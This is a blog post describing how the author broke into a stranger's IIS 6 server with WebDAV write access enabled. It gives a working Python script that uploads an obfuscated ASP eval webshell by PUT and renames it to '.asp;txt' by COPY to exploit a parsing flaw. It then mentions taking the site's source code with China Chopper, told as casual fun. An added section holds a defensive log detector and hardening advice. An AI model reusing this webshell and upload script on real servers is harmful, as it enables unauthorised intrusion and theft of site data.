Microsoft IIS WebDAV Write Access Code Execution


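One day, while browsing around online, I came across an IIS 6 site with every HTTP method enabled. Ancient IIS 6 has a file-parsing vulnerability. So...

I used a Python script to PUT a shell as a .txt file, then COPY it to a new file with the .asp;txt suffix.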

import urllib2

def iisput():
    url="http://example.com/q.txt"
    # passwd:z
    data='<%Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>'
    req=urllib2.Request(url,data)
    req.get_method=lambda:'PUT'
    req=urllib2.urlopen(req)

def iiswrite():
    url="http://example.com/q.txt"
    req=urllib2.Request(url)
    req.get_method=lambda:'COPY'
    req.add_header('Destination', 'http://example.com/q.asp;txt')
    req=urllib2.urlopen(req)

if __name__ == '__main__':
    iisput()
    print "Txt file put successfully"
    iiswrite()
    print "Copy txt to asp successfully"

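After connecting with China Chopper (菜刀), the whole site's source code was directly exposed.

Looking at the current connections, I found the site had already been reduced to a free-for-all for other intruders, so there was nothing left to play with.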
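From the defender's side, the PUT followed by COPY and the later request to a `.asp;txt` name all show up in the IIS W3C log. The following is an added example, not part of the original post: a Python 3 log check that assumes the log carries the `c-ip`, `cs-method`, `cs-uri-stem` and `sc-status` fields; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re

# Constructed sample in IIS W3C extended format (documentation IPs, not from the post).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-04-04 10:00:01 203.0.113.7 OPTIONS / 200
2019-04-04 10:00:05 203.0.113.7 PUT /q.txt 201
2019-04-04 10:00:06 203.0.113.7 COPY /q.txt 201
2019-04-04 10:00:09 203.0.113.7 POST /q.asp;txt 200
2019-04-04 10:02:00 198.51.100.20 GET /index.asp 200
2019-04-04 10:03:00 198.51.100.21 PUT /notes.txt 403
"""

# A script-mapped extension followed by ';' is what the IIS 6 parsing flaw keys on.
# .asa/.cer/.cdx are included because IIS 6 maps them to the ASP engine by default.
SEMICOLON_SCRIPT = re.compile(r"\.(asp|asa|cer|cdx);", re.IGNORECASE)

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_webdav_abuse(lines):
    """Return (kind, client, uri) findings for the PUT -> COPY -> .asp;txt pattern."""
    uploaded = set()  # (client, uri) pairs successfully written via PUT
    findings = []
    for r in parse_w3c(lines):
        client, method, uri = r["c-ip"], r["cs-method"].upper(), r["cs-uri-stem"]
        ok = r.get("sc-status", "").startswith("2")
        if method == "PUT" and ok:
            uploaded.add((client, uri))
        elif method in ("COPY", "MOVE") and ok and (client, uri) in uploaded:
            # The Destination header is not in these fields, so correlate on the source.
            findings.append(("put-then-copy", client, uri))
        if SEMICOLON_SCRIPT.search(uri) and ok:
            findings.append(("semicolon-script-request", client, uri))
    return findings

if __name__ == "__main__":
    for finding in find_webdav_abuse(SAMPLE_LOG.splitlines()):
        print(finding)
```

Any hit is also a prompt to check whether WebDAV and write permission are needed on that site at all; with both disabled, the PUT and COPY requests are refused.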


https://guosec.online/posts/6b5b56c.html
Posted on April 4, 2019
Updated on February 24, 2022